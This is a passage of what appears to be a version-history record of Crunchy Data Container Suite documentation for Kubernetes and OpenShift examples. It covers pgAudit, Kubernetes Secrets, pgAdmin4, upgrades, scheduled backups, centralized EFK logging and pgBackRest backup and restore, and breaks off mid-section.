configuration\nstatements as well as some basic SQL commands. These\nSQL commands will cause pg_audit to create log messages in\nthe `pg_log` log file created by the database container.\n\n==== Kubernetes and OpenShift\n\nRun the following:\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/run.sh\n....\n\nThis script will create a PostgreSQL pod with the pgAudit extension configured and ready\nto use.\n\nOnce the pod is deployed successfully, run the following command to test the extension:\n\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/test-pgaudit.sh\n....\n\nThis example has been configured to log directly to stdout of the pod. 
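\n\nThe pg_audit statements that drive such a test are ordinary SQL; as an illustrative sketch (an assumption, not the exact contents of `test-pgaudit.sh`), session auditing can be enabled and exercised like this:\n\n....\n-- audit DDL and write activity for this session (pgaudit.log is the standard pgaudit setting)\nSET pgaudit.log = 'ddl, write';\ncreate table audit_test (id int);\ninsert into audit_test values (1);\n....\n\n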
To view the PostgreSQL logs,\nrun the following:\n\n....\n$CCP_CLI logs pgaudit\n....\n","old_contents":"---\ntitle: \"Kubernetes and Openshift\"\ndate: 2018-05-15T08:30:41-07:00\ndraft: false\n---\n\n:toc:\nLatest Release: 2.2.0 {docdate}\n\n== Getting Started\n\n{{% notice warning %}}\nThe Kubernetes and OpenShift examples provided on this page have been designed using single-node Kubernetes\/OCP clusters\nwhose host machines provide any required supporting infrastructure or services (e.g. local hostPath storage or access\nto an NFS share). Therefore, for the best results when running these examples, it is recommended that you utilize a\nsingle-node architecture as well.\n{{% \/notice %}}\n\n{{% notice tip %}}\nThe examples located in the *kube* directory work on both Kubernetes and OpenShift. Ensure the `CCP_CLI` environment variable\nis set to the correct binary for your environment.\n{{% \/notice %}}\n\nSet the environment variable in `.bashrc` to ensure the examples will work in your environment.\n....\n# Kubernetes\nexport CCP_CLI=kubectl\n\n# OpenShift\nexport CCP_CLI=oc\n....\n\nHere are some useful resources for finding the right commands to troubleshoot & modify containers in\nthe various environments shown in this guide:\n\n* link:http:\/\/www.bogotobogo.com\/DevOps\/Docker\/Docker-Cheat-Sheet.php[Docker Cheat Sheet]\n* link:https:\/\/kubernetes.io\/docs\/user-guide\/kubectl-cheatsheet\/[Kubectl Cheat Sheet]\n* link:https:\/\/github.com\/nekop\/openshift-sandbox\/blob\/master\/docs\/command-cheatsheet.md[OpenShift Cheat Sheet]\n* link:https:\/\/github.com\/kubernetes\/helm\/blob\/master\/docs\/using_helm.md[Helm Cheat Sheet]\n\n== Example Conventions\n\nThe examples provided in Container Suite are simple and\nare meant to demonstrate key Container Suite features. These\nexamples can be used to build more production-level deployments\nas dictated by user requirements specific to their operating\nenvironments.\n\nThe examples generally follow these conventions:\n\n * There is a *run.sh* script that you will execute to start the example.\n * There is a *cleanup.sh* script that you will execute to shut down and clean up the example.\n * Each example will create resources such as Secrets, ConfigMaps, Services, and PersistentVolumeClaims, all of which follow a naming convention of *<example name>-<optional description suffix>*. For example, an example called *primary* might have a PersistentVolumeClaim called *primary-pgconf* to describe the purpose of that particular PVC.\n * The folder names for each example give a clue as to which Container Suite feature it demonstrates. For instance, the *examples\/kube\/pgaudit* example demonstrates how to enable the pg_audit capability of the crunchy-postgres container.\n\n== Administration\n\n=== Password Management\n\nThe passwords used for the PostgreSQL user accounts are generated\nby the OpenShift `process` command. To inspect what value is\nsupplied, you can inspect the primary pod as follows:\n\n....\n${CCP_CLI} get pod pr-primary -o json | grep -C 1 'PG_USER\\|PG_PASSWORD\\|PG_DATABASE'\n....\n\nThis will give you the environment variable values for the database created by default\nin addition to the username and password of the standard user.\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_DATABASE`\n\n=== Kubernetes Secrets\n\nYou can use Kubernetes Secrets to set and maintain your database\ncredentials. 
Secrets require you to base64 encode your user and password\nvalues as follows:\n....\necho -n 'myuserid' | base64\n....\n\nYou will paste these encoded values into your JSON secrets files.\n\nThis example allows you to set the PostgreSQL passwords\nusing Kubernetes Secrets.\n\nThe secret uses a base64 encoded string to represent the\nvalues to be read by the container during initialization. The\nencoded password value is *password*. Run the example\nas follows:\n\n....\ncd $CCPROOT\/examples\/kube\/secret\n.\/run.sh\n....\n\nThe secrets are mounted in the `\/pguser`, `\/pgprimary`, and `\/pgroot` volumes within the\ncontainer and read during initialization. The container\nscripts create a PostgreSQL user with those values, and set the passwords\nfor the primary user and PostgreSQL superuser using the mounted secret volumes.\n\nWhen using secrets, you do *NOT* have to specify the following\nenvironment variables if you specify all three secrets volumes:\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_ROOT_PASSWORD`\n * `PG_PRIMARY_USER`\n * `PG_PRIMARY_PASSWORD`\n\nYou can test the container as follows. In all cases, the password is *password*:\n....\npsql -h secret -U pguser1 postgres\npsql -h secret -U postgres postgres\npsql -h secret -U primaryuser postgres\n....\n\n=== pgAdmin4\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL without TLS.\n\nAfter running the example, you should be able to browse to http:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username: *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy, run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-http 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *http:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgAdmin4 documentation] for more details.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-http\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-http\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== pgAdmin4 with TLS\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL with TLS.\n\nAfter running the example, you should be able to browse to https:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username: *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy, run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-https 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *https:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgadmin4 documentation] for more details.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd 
$CCPROOT\/examples\/docker\/pgadmin4-https\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-https\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== Upgrade\n\n{{% notice tip %}}\nThis example assumes you have run *primary* using a PG 9.5 or 9.6 image\nsuch as `centos7-9.5.14-2.2.0` prior to running this upgrade.\n{{% \/notice %}}\n\nStarting in release 1.3.1, the upgrade container will let\nyou perform a `pg_upgrade` either from a PostgreSQL version 9.5 database to\n9.6 or from 9.6 to 10.\n\nPrior to running this example, make sure your `CCP_IMAGE_TAG`\nenvironment variable is using the next major version of PostgreSQL that you\nwant to upgrade to. For example, if you're upgrading from 9.5 to 9.6, make\nsure the variable references a PG 9.6 image such as `centos7-9.6.10-2.2.0`.\n\nThis will create the following in your Kubernetes environment:\n\n * a Kubernetes Job running the *crunchy-upgrade* container\n * a new data directory named *upgrade* found in the *pgnewdata* PVC\n\n{{% notice tip %}}\nData checksums on the Crunchy PostgreSQL container were enabled by default in version 2.1.0.\nWhen trying to upgrade, it's required that both the old database and the new database\nhave the same data checksums setting. Prior to upgrade, check if `data_checksums`\nwere enabled on the database by running the following SQL: `SHOW data_checksums`\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nBefore running the example, ensure you edit `upgrade.json` and update the `OLD_VERSION`\nand `NEW_VERSION` parameters to the ones relevant to your situation.\n{{% \/notice %}}\n\nStart the upgrade as follows:\n....\ncd $CCPROOT\/examples\/kube\/upgrade\n.\/run.sh\n....\n\nIf successful, the Job will end with a **successful** status. Verify\nthe results of the Job by examining the Job's pod log:\n....\n${CCP_CLI} get pod -l job-name=upgrade\n${CCP_CLI} logs -l job-name=upgrade\n....\n\nYou can verify the upgraded database by running the `post-upgrade.sh` script in the\n`examples\/kube\/upgrade` directory. This will create a PostgreSQL pod that mounts the\nupgraded volume.\n\n=== Crunchy Scheduler\n\nThe Crunchy Scheduler container implements a cron-like microservice within a namespace\nto automate backups of a PostgreSQL database.\n\nCurrently, Crunchy Scheduler only supports two types of tasks:\n\n* pgBackRest\n* pgBaseBackup\n\nThis service watches Kubernetes for config maps with the label `crunchy-scheduler=true`.\nIf found, the scheduler will parse the data found in the config map (a JSON object) and\nconvert it to a scheduled task. If the config map is removed, the scheduler will\ndelete the task.\n\nSee the following examples for creating config maps that Crunchy Scheduler can parse:\n\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-diff.json[pgBackRest Diff Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-full.json[pgBackRest Full Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-pgbasebackup.json[pgBaseBackup Backup]\n\nThe Crunchy Scheduler requires a Service Account to create jobs (pgBaseBackup) and to\nexec (pgBackRest). 
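\n\nAs a rough illustration, the role bound to that Service Account needs RBAC rules along these lines (a sketch of the idea only, not the exact contents of `scheduler-sa.json`):\n\n....\n\"rules\": [{\n  \"apiGroups\": [\"\"],\n  \"resources\": [\"pods\", \"pods\/exec\"],\n  \"verbs\": [\"get\", \"list\", \"create\"]\n}, {\n  \"apiGroups\": [\"batch\"],\n  \"resources\": [\"jobs\"],\n  \"verbs\": [\"get\", \"list\", \"create\", \"delete\"]\n}]\n....\n\n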
See the link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/scheduler-sa.json[scheduler example]\nfor the required permissions on this account.\n\n==== pgBackRest Schedules\n\nTo configure Crunchy Scheduler to create pgBackRest backups, the following is required:\n\n* A deployment name in the pgBackRest schedule definition; the PostgreSQL pod should be created by a deployment.\n\n==== pgBaseBackup Schedules\n\nTo configure Crunchy Scheduler to create pgBaseBackup scheduled backups, the following is required:\n\n* The name of the secret that contains the username and password the Scheduler will use to\n configure the job template. See link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/primary\/secret.json[the primary secret example]\n for the structure required by the Scheduler.\n* The name of the PVC created for the backups. This should be created by the user prior to scheduling the task.\n\n==== Kubernetes and OpenShift\n\nFirst, start the PostgreSQL example created for the Scheduler by running the following commands:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\/primary\n.\/run.sh\n....\n\nThe pod created should show a ready status before proceeding.\n\nNext, start the scheduler by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/run.sh\n....\n\nOnce the scheduler is deployed, register the backup tasks by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/add-schedules.sh\n....\n\nThe scheduled tasks will do the following (these schedules are chosen for fast results and are not recommended for production):\n\n* take a backup every minute using pgBaseBackup\n* take a full pgBackRest backup every even minute\n* take a diff pgBackRest backup every odd minute\n\nView the logs for the `scheduler` pod until the tasks run:\n\n....\n${CCP_CLI?} logs scheduler -f\n....\n\nView the `pgBaseBackup` pods' results after the backup completes:\n\n....\n${CCP_CLI?} logs <basebackup pod name>\n....\n\nView the `pgBackRest` backups via exec after the backup completes:\n\n....\n${CCP_CLI?} exec -ti <primary deployment pod name> -- pgbackrest info\n....\n\nClean up the examples by running the following commands:\n\n....\n$CCPROOT\/examples\/kube\/scheduler\/primary\/cleanup.sh\n$CCPROOT\/examples\/kube\/scheduler\/cleanup.sh\n....\n\n=== Vacuum\n\nYou can perform a PostgreSQL vacuum command by running the crunchy-vacuum\ncontainer. You specify a database to vacuum using environment variables. By default,\nvacuum is executed against the *primary* example container.\n\nThe crunchy-vacuum container image exists to give a DBA a way to run a job either\nindividually or scheduled to perform a variety of vacuum operations.\n\nThis example performs a vacuum on a single table in the primary PostgreSQL\ndatabase. The crunchy-vacuum image is executed with the PostgreSQL connection\nparameters to the single-primary PostgreSQL container. 
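\n\nConceptually, the job boils down to running an ordinary SQL vacuum statement against the configured table, for example (the table name here is hypothetical):\n\n....\n-- analyze after vacuuming so the planner statistics are refreshed\nVACUUM ANALYZE testtable;\n....\n\n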
The type of vacuum performed is\ndictated by the environment variables passed into the job; these are defined in further detail\nlink:\/container-specifications\/crunchy-vacuum[here].\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/vacuum\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/vacuum\/\n.\/run.sh\n....\n\nVerify the job is completed:\n....\n${CCP_CLI} get job\n....\n\n=== systemd\n\nThe crunchy-pg.service is an example of a systemd unit file\nthat starts and stops a container named crunchy-pg that\nhas already been created.\n\nThe example scripts are located in the following directory:\n....\n$CCPROOT\/examples\/systemd\/\n....\n\nThere are two scripts within the directory.\n\n....\ntest-start.sh\n....\n\nThis script is called by the systemd start execution. The trick\nwith this script is that it blocks forever after starting the\nDocker crunchy-pg container. The blocking keeps systemd happy,\nas it treats the script like a normal daemon.\n\n....\ntest-stop.sh\n....\n\nThis script stops the test-start.sh script and also stops the\ncrunchy-pg Docker container.\n\n=== Centralized Logging\n\nThe logs generated by containers are critical for deployments because they provide insights into the\nhealth of the system. PostgreSQL logs are very detailed, and some information can only be\nobtained from the logs, including (but not limited to):\n\n* Connections and Disconnections of users\n* Checkpoint Statistics\n* PostgreSQL Server Errors\n\nAggregating container logs across multiple hosts allows administrators to audit activity, debug problems, and prevent\nrepudiation of misconduct.\n\nIn the following example we will demonstrate how to set up Kubernetes and OpenShift to use centralized logging by using\nan EFK (Elasticsearch, Fluentd, and Kibana) stack. Fluentd will run as a daemonset on each host within the Kubernetes\ncluster and extract container logs; Elasticsearch will consume and index the logs gathered by Fluentd; and Kibana will allow\nusers to explore and visualize the logs via a web dashboard.\n\nTo learn more about the EFK stack, see the following:\n\n* https:\/\/www.elastic.co\/products\/elasticsearch\n* https:\/\/www.fluentd.org\/architecture\n* https:\/\/www.elastic.co\/products\/kibana\n\n==== Configure PostgreSQL for Centralized Logging\n\nBy default, Crunchy PostgreSQL logs to files in the `\/pgdata` directory. In order to get the logs\nout of the container, we need to configure PostgreSQL to log to the container console.\n\nThe following settings should be configured in `postgresql.conf` to make PostgreSQL log to the console:\n\n```\nlog_destination = 'stderr'\nlogging_collector = off\n```\n\n{{% notice warning %}}\nChanges to logging settings require a restart of the PostgreSQL container to take effect.\n{{% \/notice %}}\n\n==== Deploying the EFK Stack On OpenShift Container Platform\n\nOpenShift Container Platform can be installed with an EFK stack. 
For more information about\nconfiguring OpenShift to create an EFK stack, see the official documentation:\n\n* https:\/\/docs.openshift.com\/container-platform\/3.10\/install_config\/aggregate_logging.html\n\n==== Deploying the EFK Stack On Kubernetes\n\nFirst, deploy the EFK stack by running the example using the following commands:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/efk\n.\/run.sh\n....\n\n{{% notice warning %}}\nElasticsearch is configured to use an `emptyDir` volume in this example. Configure this example to provide a\npersistent volume when deploying into production.\n{{% \/notice %}}\n\nNext, verify the pods are running in the `kube-system` namespace:\n\n```\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=elasticsearch-logging\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=fluentd-es\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=kibana-logging\n```\n\nIf all pods deployed successfully, Elasticsearch should already be receiving container logs from Fluentd.\n\nNext, we will deploy a PostgreSQL cluster (primary and replica deployments) to demonstrate that PostgreSQL logs\nare being captured by Fluentd.\n\nDeploy the PostgreSQL cluster by running the following:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/postgres-cluster\n.\/run.sh\n....\n\nNext, verify the pods are running:\n\n....\n${CCP_CLI?} get pods --selector=k8s-app=postgres-cluster\n....\n\nWith the PostgreSQL cluster successfully deployed, we can now query the logs in Kibana.\n\nWe will need to set up a port-forward to the Kibana pod to access it. To do that,\nwe first get the name of the pod by running the following command:\n\n....\n${CCP_CLI?} get pod --selector=k8s-app=kibana-logging -n kube-system\n....\n\nNext, start the port-forward:\n\n....\n${CCP_CLI?} port-forward <KIBANA POD NAME> 5601:5601 -n kube-system\n....\n\nTo access the web dashboard, navigate in a browser to `127.0.0.1:5601`.\n\nFirst, click the `Discover` tab and set up an index pattern to use for queries.\n\nThe index pattern name we will use is `logstash-*` because Fluentd is configured to\ngenerate logstash-style logs.\n\nNext, we will configure the `Time Filter field name` to be `@timestamp`.\n\nNow that our index pattern is created, we can query for the container logs.\n\nClick the `Discover` tab and use the following queries:\n\n....\n# KUBERNETES\nCONTAINER_NAME: *primary* AND MESSAGE: \".*LOG*\"\n# OpenShift\nkubernetes.pod_name: \"primary\" AND log\n....\n\nFor more information about querying Kibana, see the official documentation: https:\/\/www.elastic.co\/guide\/en\/beats\/packetbeat\/current\/kibana-queries-filters.html\n\n== Backup and Restoration\n\n=== pg_dump\n\nThe script assumes you are going to back up the *primary* example and that the container\nis running.\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nA successful backup will perform pg_dump\/pg_dumpall on the primary and store\nthe resulting files in the mounted volume under a sub-directory named `<HOSTNAME>-backups`,\nfollowed by a unique backup directory based upon a\ndate and timestamp, allowing any number of backups to be kept.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== 
Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgdump\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgdump\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgdump.json` file within that directory specifies options that control the behavior of the pgdump job.\nExamples of this include whether to run pg_dump vs pg_dumpall and advanced options for specific backup use cases.\n\n=== pg_restore\n\nThe script assumes you are going to restore to the *primary* example, that the container\nis running, and that a backup has been created using the `pgdump` example.\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nSuccessful use of the `crunchy-pgrestore` container will run a job to restore files generated by\npg_dump\/pg_dumpall to a container via psql\/pg_restore; then the container will terminate successfully\nand signal job completion.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the restore with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgrestore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nBy default, the pgrestore container will automatically restore from the most recent backup.\nIf you want to restore to a specific backup, edit the `pgrestore.json` file and update the\n`PGRESTORE_BACKUP_TIMESTAMP` setting to specify the backup path you want to restore with. For example:\n....\n\"name\":\"PGRESTORE_BACKUP_TIMESTAMP\",\n\"value\":\"2018-03-27-14-35-33\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgrestore\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgrestore.json` file within that directory specifies options that control the behavior of the pgrestore job.\n\n=== pgBackRest\n\npgbackrest is a utility that performs a backup, restore, and archive\nfunction for a PostgreSQL database. pgbackrest is written and\nmaintained by David Steele, and more information can be found on the\nlink:http:\/\/www.pgbackrest.org\/[official website].\n\nBackups are currently performed by manually executing pgbackrest commands against the desired pod.\nRestores can now be performed via the crunchy-backrest-restore container, which offers FULL or\nDELTA restore capability.\n\npgbackrest is configured using a `pgbackrest.conf` file that is\nmounted into the crunchy-postgres container at `\/pgconf`.\n\nIf you place a `pgbackrest.conf` file within this mounted directory, it\nwill trigger the use of pgbackrest within the PostgreSQL container\nas the `archive_command` and will turn on the `archive_mode` to begin\narchival. 
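\n\nTo make that concrete, a minimal `pgbackrest.conf` consistent with the conventions described below might look like this (a sketch only; the mounted example files are the reference):\n\n....\n[global]\nrepo-path=\/backrestrepo\/HOSTNAME-backups\n\n[db]\ndb-path=\/pgdata\/HOSTNAME\n....\n\n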
It is still required to define the `ARCHIVE_TIMEOUT` environment\nvariable within your container configuration as it is set to\na value of 0 by default, which disables the timeout.\n\nThe following changes will be made to the container's `postgresql.conf`\nfile:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\nARCHIVE_COMMAND='pgbackrest --stanza=db archive-push %p'\n....\n\nIf you are using a crunchy-postgres image older than 1.7.1, `archive_command` must specify where\nthe `pgbackrest.conf` file is located:\n....\nARCHIVE_COMMAND='pgbackrest --config=\/pgconf\/pgbackrest.conf --stanza=db archive-push %p'\n....\n\n{{% notice warning %}}\nThis requires you to use a pgbackrest stanza name of *db* within the\n`pgbackrest.conf` file you mount.\n{{% \/notice %}}\n\nWhen set, WAL files generated by the database will be written\nout to the `\/backrestrepo\/HOSTNAME-backups` mount point.\n\nAdditionally, the Crunchy Postgres container can templatize `pgbackrest.conf` files\nby searching for HOSTNAME values in a mounted `pgbackrest.conf` file.\n\nFor example, `db-path=\/pgdata\/HOSTNAME` will render to `db-path=\/pgdata\/primary` if\nthe container's hostname is primary. HOSTNAME will be replaced with the value of\n`PGDATA_PATH_OVERRIDE` when working with deployments\/replicasets.\n\n{{% notice warning %}}\nThe templating example above works for `db-path` settings; however, `repo-path` should\nfollow the convention `repo-path=\/backrestrepo\/HOSTNAME-backups` in cases where\nvolumes are being mounted to a single mount point (such as hostPath or NFS). Without\nthe additional `-backups`, the backups will be placed in the `pgdata` directory.\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup with pgBackRest by running the following within the container:\n....\n${CCP_CLI} exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\npgBackRest supports asynchronous archiving to pull and push Write Ahead Logs.\nAsynchronous operation is more efficient because it can reuse connections and take\nadvantage of parallelism. 
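\n\nIn configuration terms, asynchronous archiving is typically switched on in `pgbackrest.conf` with settings along these lines (a sketch; the spool path convention is discussed in the warning further below):\n\n....\n[global]\narchive-async=y\nspool-path=\/pgdata\/HOSTNAME-spool\n....\n\n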
For more information on async archiving, see the pgBackRest\nlink:https:\/\/pgbackrest.org\/user-guide.html#async-archiving[official documentation].\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured and archiving asynchronously\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup with pgBackRest by running the following within the container:\n....\n${CCP_CLI} exec -it backrest-async-archive \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\nThere are three options to choose from when performing a restore:\n\n * Delta - only restore missing files from PGDATA\n * Full - restore all files, pgdata must be empty\n * Point in Time Recovery (PITR) - delta restore to a certain point in time\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running, and a\npgBackRest backup must already have been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. 
It does not need to be running, but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New PVC for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running, but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for delta restore\n\npgBackRest will restore missing files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n==== Docker\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup with pgBackRest by running the following within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup with pgBackRest by running the following within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. 
